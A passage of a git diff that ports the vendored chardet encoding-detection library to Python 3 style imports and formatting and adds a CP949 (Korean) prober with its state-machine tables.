28 - 2F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F - OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 40 - 47 - ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F - ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57 - ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F - OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67 - ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F - ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 70 - 77 - ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F - OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87 - OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F - UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97 - OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF - ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7 - ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF - ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7 - ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF - ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7 - ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF - ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7 - ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF +Latin1_CharToClass = ( + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 28 - 2F + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F + OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 40 - 47 + ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F + ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57 + ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F + OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67 + ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F + ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 70 - 77 + ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F + OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87 + OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F + UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97 + OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF + ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7 + ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF + ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7 + ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF + ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7 + ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF + ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7 + ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF ) -# 0 : illegal -# 1 : very unlikely -# 2 : normal +# 0 : illegal +# 1 : very unlikely +# 2 : normal # 3 : very likely -Latin1ClassModel = ( \ -# UDF OTH ASC ASS ACV ACO ASV ASO - 0, 0, 0, 0, 0, 0, 0, 0, # UDF - 0, 3, 3, 3, 3, 3, 3, 3, # OTH - 0, 3, 3, 3, 3, 3, 3, 3, # ASC - 0, 3, 3, 3, 1, 1, 3, 3, # ASS - 0, 3, 3, 3, 1, 2, 1, 2, # ACV - 0, 3, 3, 3, 3, 3, 3, 3, # ACO - 0, 3, 1, 3, 1, 1, 1, 3, # ASV - 0, 3, 1, 3, 1, 1, 3, 3, # ASO +Latin1ClassModel = ( + # UDF OTH ASC ASS ACV ACO ASV ASO + 0, 0, 0, 0, 0, 0, 0, 0, # UDF + 0, 3, 3, 3, 3, 3, 3, 3, # OTH + 0, 3, 3, 3, 3, 3, 3, 3, # ASC + 0, 3, 3, 3, 1, 1, 3, 3, # ASS + 0, 3, 3, 3, 1, 2, 1, 2, # ACV + 0, 3, 3, 3, 3, 3, 3, 3, # ACO + 0, 3, 1, 3, 1, 1, 1, 3, # ASV + 0, 3, 1, 3, 1, 1, 3, 3, # ASO ) + class Latin1Prober(CharSetProber): def __init__(self): CharSetProber.__init__(self) @@ -109,10 +110,11 @@ class Latin1Prober(CharSetProber): def feed(self, aBuf): aBuf = self.filter_with_english_letters(aBuf) for c in aBuf: - charClass = Latin1_CharToClass[ord(c)] - freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM) + charClass] + charClass = Latin1_CharToClass[wrap_ord(c)] + freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM) + + charClass] if freq == 0: - self._mState = constants.eNotMe + self._mState = eNotMe break self._mFreqCounter[freq] += 1 self._mLastCharClass = charClass @@ -120,17 +122,18 @@ class Latin1Prober(CharSetProber): return self.get_state() def get_confidence(self): - if self.get_state() == constants.eNotMe: + if self.get_state() == eNotMe: return 0.01 - total = reduce(operator.add, self._mFreqCounter) + total = sum(self._mFreqCounter) if total < 0.01: confidence = 0.0 else: - confidence = (self._mFreqCounter[3] / total) - (self._mFreqCounter[1] * 20.0 / total) + confidence = ((self._mFreqCounter[3] - self._mFreqCounter[1] * 20.0) + / total) if confidence < 0.0: confidence = 0.0 - # lower the confidence of latin1 so that other more accurate detector - # can take priority. - confidence = confidence * 0.5 + # lower the confidence of latin1 so that other more accurate + # detector can take priority. + confidence = confidence * 0.73 return confidence diff --git a/thirdparty/chardet/mbcharsetprober.py b/thirdparty/chardet/mbcharsetprober.py index 09b035e02..bb42f2fb5 100644 --- a/thirdparty/chardet/mbcharsetprober.py +++ b/thirdparty/chardet/mbcharsetprober.py @@ -15,28 +15,29 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from constants import eStart, eError, eItsMe -from charsetprober import CharSetProber +import sys +from . import constants +from .charsetprober import CharSetProber + class MultiByteCharSetProber(CharSetProber): def __init__(self): CharSetProber.__init__(self) self._mDistributionAnalyzer = None self._mCodingSM = None - self._mLastChar = ['\x00', '\x00'] + self._mLastChar = [0, 0] def reset(self): CharSetProber.reset(self) @@ -44,36 +45,39 @@ class MultiByteCharSetProber(CharSetProber): self._mCodingSM.reset() if self._mDistributionAnalyzer: self._mDistributionAnalyzer.reset() - self._mLastChar = ['\x00', '\x00'] + self._mLastChar = [0, 0] def get_charset_name(self): pass def feed(self, aBuf): aLen = len(aBuf) - for i in xrange(0, aLen): + for i in range(0, aLen): codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: + if codingState == constants.eError: if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') + sys.stderr.write(self.get_charset_name() + + ' prober hit error at byte ' + str(i) + + '\n') self._mState = constants.eNotMe break - elif codingState == eItsMe: + elif codingState == constants.eItsMe: self._mState = constants.eFoundIt break - elif codingState == eStart: + elif codingState == constants.eStart: charLen = self._mCodingSM.get_current_charlen() if i == 0: self._mLastChar[1] = aBuf[0] self._mDistributionAnalyzer.feed(self._mLastChar, charLen) else: - self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen) + self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1], + charLen) self._mLastChar[0] = aBuf[aLen - 1] if self.get_state() == constants.eDetecting: - if self._mDistributionAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): + if (self._mDistributionAnalyzer.got_enough_data() and + (self.get_confidence() > constants.SHORTCUT_THRESHOLD)): self._mState = constants.eFoundIt return self.get_state() diff --git a/thirdparty/chardet/mbcsgroupprober.py b/thirdparty/chardet/mbcsgroupprober.py index 941cc3e37..03c9dcf3e 100644 --- a/thirdparty/chardet/mbcsgroupprober.py +++ b/thirdparty/chardet/mbcsgroupprober.py @@ -15,36 +15,40 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from charsetgroupprober import CharSetGroupProber -from utf8prober import UTF8Prober -from sjisprober import SJISProber -from eucjpprober import EUCJPProber -from gb2312prober import GB2312Prober -from euckrprober import EUCKRProber -from big5prober import Big5Prober -from euctwprober import EUCTWProber +from .charsetgroupprober import CharSetGroupProber +from .utf8prober import UTF8Prober +from .sjisprober import SJISProber +from .eucjpprober import EUCJPProber +from .gb2312prober import GB2312Prober +from .euckrprober import EUCKRProber +from .cp949prober import CP949Prober +from .big5prober import Big5Prober +from .euctwprober import EUCTWProber + class MBCSGroupProber(CharSetGroupProber): def __init__(self): CharSetGroupProber.__init__(self) - self._mProbers = [ \ + self._mProbers = [ UTF8Prober(), SJISProber(), EUCJPProber(), GB2312Prober(), EUCKRProber(), + CP949Prober(), Big5Prober(), - EUCTWProber()] + EUCTWProber() + ] self.reset() diff --git a/thirdparty/chardet/mbcssm.py b/thirdparty/chardet/mbcssm.py index 2b68306b0..efe678ca0 100644 --- a/thirdparty/chardet/mbcssm.py +++ b/thirdparty/chardet/mbcssm.py @@ -13,60 +13,62 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from constants import eStart, eError, eItsMe +from .constants import eStart, eError, eItsMe -# BIG5 +# BIG5 -BIG5_cls = ( \ +BIG5_cls = ( 1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as legal value - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,1, # 78 - 7f - 4,4,4,4,4,4,4,4, # 80 - 87 - 4,4,4,4,4,4,4,4, # 88 - 8f - 4,4,4,4,4,4,4,4, # 90 - 97 - 4,4,4,4,4,4,4,4, # 98 - 9f - 4,3,3,3,3,3,3,3, # a0 - a7 - 3,3,3,3,3,3,3,3, # a8 - af - 3,3,3,3,3,3,3,3, # b0 - b7 - 3,3,3,3,3,3,3,3, # b8 - bf - 3,3,3,3,3,3,3,3, # c0 - c7 - 3,3,3,3,3,3,3,3, # c8 - cf - 3,3,3,3,3,3,3,3, # d0 - d7 - 3,3,3,3,3,3,3,3, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,3,3,3, # e8 - ef - 3,3,3,3,3,3,3,3, # f0 - f7 - 3,3,3,3,3,3,3,0) # f8 - ff + 1,1,1,1,1,1,0,0, # 08 - 0f + 1,1,1,1,1,1,1,1, # 10 - 17 + 1,1,1,0,1,1,1,1, # 18 - 1f + 1,1,1,1,1,1,1,1, # 20 - 27 + 1,1,1,1,1,1,1,1, # 28 - 2f + 1,1,1,1,1,1,1,1, # 30 - 37 + 1,1,1,1,1,1,1,1, # 38 - 3f + 2,2,2,2,2,2,2,2, # 40 - 47 + 2,2,2,2,2,2,2,2, # 48 - 4f + 2,2,2,2,2,2,2,2, # 50 - 57 + 2,2,2,2,2,2,2,2, # 58 - 5f + 2,2,2,2,2,2,2,2, # 60 - 67 + 2,2,2,2,2,2,2,2, # 68 - 6f + 2,2,2,2,2,2,2,2, # 70 - 77 + 2,2,2,2,2,2,2,1, # 78 - 7f + 4,4,4,4,4,4,4,4, # 80 - 87 + 4,4,4,4,4,4,4,4, # 88 - 8f + 4,4,4,4,4,4,4,4, # 90 - 97 + 4,4,4,4,4,4,4,4, # 98 - 9f + 4,3,3,3,3,3,3,3, # a0 - a7 + 3,3,3,3,3,3,3,3, # a8 - af + 3,3,3,3,3,3,3,3, # b0 - b7 + 3,3,3,3,3,3,3,3, # b8 - bf + 3,3,3,3,3,3,3,3, # c0 - c7 + 3,3,3,3,3,3,3,3, # c8 - cf + 3,3,3,3,3,3,3,3, # d0 - d7 + 3,3,3,3,3,3,3,3, # d8 - df + 3,3,3,3,3,3,3,3, # e0 - e7 + 3,3,3,3,3,3,3,3, # e8 - ef + 3,3,3,3,3,3,3,3, # f0 - f7 + 3,3,3,3,3,3,3,0 # f8 - ff +) -BIG5_st = ( \ - eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 - eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f - eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart)#10-17 +BIG5_st = ( + eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 + eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f + eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart#10-17 +) Big5CharLenTable = (0, 1, 1, 2, 0) @@ -76,48 +78,90 @@ Big5SMModel = {'classTable': BIG5_cls, 'charLenTable': Big5CharLenTable, 'name': 'Big5'} +# CP949 + +CP949_cls = ( + 1,1,1,1,1,1,1,1, 1,1,1,1,1,1,0,0, # 00 - 0f + 1,1,1,1,1,1,1,1, 1,1,1,0,1,1,1,1, # 10 - 1f + 1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 20 - 2f + 1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 30 - 3f + 1,4,4,4,4,4,4,4, 4,4,4,4,4,4,4,4, # 40 - 4f + 4,4,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 50 - 5f + 1,5,5,5,5,5,5,5, 5,5,5,5,5,5,5,5, # 60 - 6f + 5,5,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 70 - 7f + 0,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 80 - 8f + 6,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 90 - 9f + 6,7,7,7,7,7,7,7, 7,7,7,7,7,8,8,8, # a0 - af + 7,7,7,7,7,7,7,7, 7,7,7,7,7,7,7,7, # b0 - bf + 7,7,7,7,7,7,9,2, 2,3,2,2,2,2,2,2, # c0 - cf + 2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # d0 - df + 2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # e0 - ef + 2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,0, # f0 - ff +) + +CP949_st = ( +#cls= 0 1 2 3 4 5 6 7 8 9 # previous state = + eError,eStart, 3,eError,eStart,eStart, 4, 5,eError, 6, # eStart + eError,eError,eError,eError,eError,eError,eError,eError,eError,eError, # eError + eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe, # eItsMe + eError,eError,eStart,eStart,eError,eError,eError,eStart,eStart,eStart, # 3 + eError,eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 4 + eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 5 + eError,eStart,eStart,eStart,eStart,eError,eError,eStart,eStart,eStart, # 6 +) + +CP949CharLenTable = (0, 1, 2, 0, 1, 1, 2, 2, 0, 2) + +CP949SMModel = {'classTable': CP949_cls, + 'classFactor': 10, + 'stateTable': CP949_st, + 'charLenTable': CP949CharLenTable, + 'name': 'CP949'} + # EUC-JP -EUCJP_cls = ( \ - 4,4,4,4,4,4,4,4, # 00 - 07 - 4,4,4,4,4,4,5,5, # 08 - 0f - 4,4,4,4,4,4,4,4, # 10 - 17 - 4,4,4,5,4,4,4,4, # 18 - 1f - 4,4,4,4,4,4,4,4, # 20 - 27 - 4,4,4,4,4,4,4,4, # 28 - 2f - 4,4,4,4,4,4,4,4, # 30 - 37 - 4,4,4,4,4,4,4,4, # 38 - 3f - 4,4,4,4,4,4,4,4, # 40 - 47 - 4,4,4,4,4,4,4,4, # 48 - 4f - 4,4,4,4,4,4,4,4, # 50 - 57 - 4,4,4,4,4,4,4,4, # 58 - 5f - 4,4,4,4,4,4,4,4, # 60 - 67 - 4,4,4,4,4,4,4,4, # 68 - 6f - 4,4,4,4,4,4,4,4, # 70 - 77 - 4,4,4,4,4,4,4,4, # 78 - 7f - 5,5,5,5,5,5,5,5, # 80 - 87 - 5,5,5,5,5,5,1,3, # 88 - 8f - 5,5,5,5,5,5,5,5, # 90 - 97 - 5,5,5,5,5,5,5,5, # 98 - 9f - 5,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,2,2,2, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,2,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,0,5) # f8 - ff +EUCJP_cls = ( + 4,4,4,4,4,4,4,4, # 00 - 07 + 4,4,4,4,4,4,5,5, # 08 - 0f + 4,4,4,4,4,4,4,4, # 10 - 17 + 4,4,4,5,4,4,4,4, # 18 - 1f + 4,4,4,4,4,4,4,4, # 20 - 27 + 4,4,4,4,4,4,4,4, # 28 - 2f + 4,4,4,4,4,4,4,4, # 30 - 37 + 4,4,4,4,4,4,4,4, # 38 - 3f + 4,4,4,4,4,4,4,4, # 40 - 47 + 4,4,4,4,4,4,4,4, # 48 - 4f + 4,4,4,4,4,4,4,4, # 50 - 57 + 4,4,4,4,4,4,4,4, # 58 - 5f + 4,4,4,4,4,4,4,4, # 60 - 67 + 4,4,4,4,4,4,4,4, # 68 - 6f + 4,4,4,4,4,4,4,4, # 70 - 77 + 4,4,4,4,4,4,4,4, # 78 - 7f + 5,5,5,5,5,5,5,5, # 80 - 87 + 5,5,5,5,5,5,1,3, # 88 - 8f + 5,5,5,5,5,5,5,5, # 90 - 97 + 5,5,5,5,5,5,5,5, # 98 - 9f + 5,2,2,2,2,2,2,2, # a0 - a7 + 2,2,2,2,2,2,2,2, # a8 - af + 2,2,2,2,2,2,2,2, # b0 - b7 + 2,2,2,2,2,2,2,2, # b8 - bf + 2,2,2,2,2,2,2,2, # c0 - c7 + 2,2,2,2,2,2,2,2, # c8 - cf + 2,2,2,2,2,2,2,2, # d0 - d7 + 2,2,2,2,2,2,2,2, # d8 - df + 0,0,0,0,0,0,0,0, # e0 - e7 + 0,0,0,0,0,0,0,0, # e8 - ef + 0,0,0,0,0,0,0,0, # f0 - f7 + 0,0,0,0,0,0,0,5 # f8 - ff +) -EUCJP_st = ( \ - 3, 4, 3, 5,eStart,eError,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17 - eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f - 3,eError,eError,eError,eStart,eStart,eStart,eStart)#20-27 +EUCJP_st = ( + 3, 4, 3, 5,eStart,eError,eError,eError,#00-07 + eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17 + eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f + 3,eError,eError,eError,eStart,eStart,eStart,eStart#20-27 +) EUCJPCharLenTable = (2, 2, 2, 3, 1, 0) @@ -129,43 +173,45 @@ EUCJPSMModel = {'classTable': EUCJP_cls, # EUC-KR -EUCKR_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 1,1,1,1,1,1,1,1, # 40 - 47 - 1,1,1,1,1,1,1,1, # 48 - 4f - 1,1,1,1,1,1,1,1, # 50 - 57 - 1,1,1,1,1,1,1,1, # 58 - 5f - 1,1,1,1,1,1,1,1, # 60 - 67 - 1,1,1,1,1,1,1,1, # 68 - 6f - 1,1,1,1,1,1,1,1, # 70 - 77 - 1,1,1,1,1,1,1,1, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,3,3,3, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,3,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 2,2,2,2,2,2,2,2, # e0 - e7 - 2,2,2,2,2,2,2,2, # e8 - ef - 2,2,2,2,2,2,2,2, # f0 - f7 - 2,2,2,2,2,2,2,0) # f8 - ff +EUCKR_cls = ( + 1,1,1,1,1,1,1,1, # 00 - 07 + 1,1,1,1,1,1,0,0, # 08 - 0f + 1,1,1,1,1,1,1,1, # 10 - 17 + 1,1,1,0,1,1,1,1, # 18 - 1f + 1,1,1,1,1,1,1,1, # 20 - 27 + 1,1,1,1,1,1,1,1, # 28 - 2f + 1,1,1,1,1,1,1,1, # 30 - 37 + 1,1,1,1,1,1,1,1, # 38 - 3f + 1,1,1,1,1,1,1,1, # 40 - 47 + 1,1,1,1,1,1,1,1, # 48 - 4f + 1,1,1,1,1,1,1,1, # 50 - 57 + 1,1,1,1,1,1,1,1, # 58 - 5f + 1,1,1,1,1,1,1,1, # 60 - 67 + 1,1,1,1,1,1,1,1, # 68 - 6f + 1,1,1,1,1,1,1,1, # 70 - 77 + 1,1,1,1,1,1,1,1, # 78 - 7f + 0,0,0,0,0,0,0,0, # 80 - 87 + 0,0,0,0,0,0,0,0, # 88 - 8f + 0,0,0,0,0,0,0,0, # 90 - 97 + 0,0,0,0,0,0,0,0, # 98 - 9f + 0,2,2,2,2,2,2,2, # a0 - a7 + 2,2,2,2,2,3,3,3, # a8 - af + 2,2,2,2,2,2,2,2, # b0 - b7 + 2,2,2,2,2,2,2,2, # b8 - bf + 2,2,2,2,2,2,2,2, # c0 - c7 + 2,3,2,2,2,2,2,2, # c8 - cf + 2,2,2,2,2,2,2,2, # d0 - d7 + 2,2,2,2,2,2,2,2, # d8 - df + 2,2,2,2,2,2,2,2, # e0 - e7 + 2,2,2,2,2,2,2,2, # e8 - ef + 2,2,2,2,2,2,2,2, # f0 - f7 + 2,2,2,2,2,2,2,0 # f8 - ff +) EUCKR_st = ( - eError,eStart, 3,eError,eError,eError,eError,eError,#00-07 - eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart)#08-0f + eError,eStart, 3,eError,eError,eError,eError,eError,#00-07 + eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart #08-0f +) EUCKRCharLenTable = (0, 1, 2, 0) @@ -177,47 +223,49 @@ EUCKRSMModel = {'classTable': EUCKR_cls, # EUC-TW -EUCTW_cls = ( \ - 2,2,2,2,2,2,2,2, # 00 - 07 - 2,2,2,2,2,2,0,0, # 08 - 0f - 2,2,2,2,2,2,2,2, # 10 - 17 - 2,2,2,0,2,2,2,2, # 18 - 1f - 2,2,2,2,2,2,2,2, # 20 - 27 - 2,2,2,2,2,2,2,2, # 28 - 2f - 2,2,2,2,2,2,2,2, # 30 - 37 - 2,2,2,2,2,2,2,2, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,2, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,6,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,3,4,4,4,4,4,4, # a0 - a7 - 5,5,1,1,1,1,1,1, # a8 - af - 1,1,1,1,1,1,1,1, # b0 - b7 - 1,1,1,1,1,1,1,1, # b8 - bf - 1,1,3,1,3,3,3,3, # c0 - c7 - 3,3,3,3,3,3,3,3, # c8 - cf - 3,3,3,3,3,3,3,3, # d0 - d7 - 3,3,3,3,3,3,3,3, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,3,3,3, # e8 - ef - 3,3,3,3,3,3,3,3, # f0 - f7 - 3,3,3,3,3,3,3,0) # f8 - ff +EUCTW_cls = ( + 2,2,2,2,2,2,2,2, # 00 - 07 + 2,2,2,2,2,2,0,0, # 08 - 0f + 2,2,2,2,2,2,2,2, # 10 - 17 + 2,2,2,0,2,2,2,2, # 18 - 1f + 2,2,2,2,2,2,2,2, # 20 - 27 + 2,2,2,2,2,2,2,2, # 28 - 2f + 2,2,2,2,2,2,2,2, # 30 - 37 + 2,2,2,2,2,2,2,2, # 38 - 3f + 2,2,2,2,2,2,2,2, # 40 - 47 + 2,2,2,2,2,2,2,2, # 48 - 4f + 2,2,2,2,2,2,2,2, # 50 - 57 + 2,2,2,2,2,2,2,2, # 58 - 5f + 2,2,2,2,2,2,2,2, # 60 - 67 + 2,2,2,2,2,2,2,2, # 68 - 6f + 2,2,2,2,2,2,2,2, # 70 - 77 + 2,2,2,2,2,2,2,2, # 78 - 7f + 0,0,0,0,0,0,0,0, # 80 - 87 + 0,0,0,0,0,0,6,0, # 88 - 8f + 0,0,0,0,0,0,0,0, # 90 - 97 + 0,0,0,0,0,0,0,0, # 98 - 9f + 0,3,4,4,4,4,4,4, # a0 - a7 + 5,5,1,1,1,1,1,1, # a8 - af + 1,1,1,1,1,1,1,1, # b0 - b7 + 1,1,1,1,1,1,1,1, # b8 - bf + 1,1,3,1,3,3,3,3, # c0 - c7 + 3,3,3,3,3,3,3,3, # c8 - cf + 3,3,3,3,3,3,3,3, # d0 - d7 + 3,3,3,3,3,3,3,3, # d8 - df + 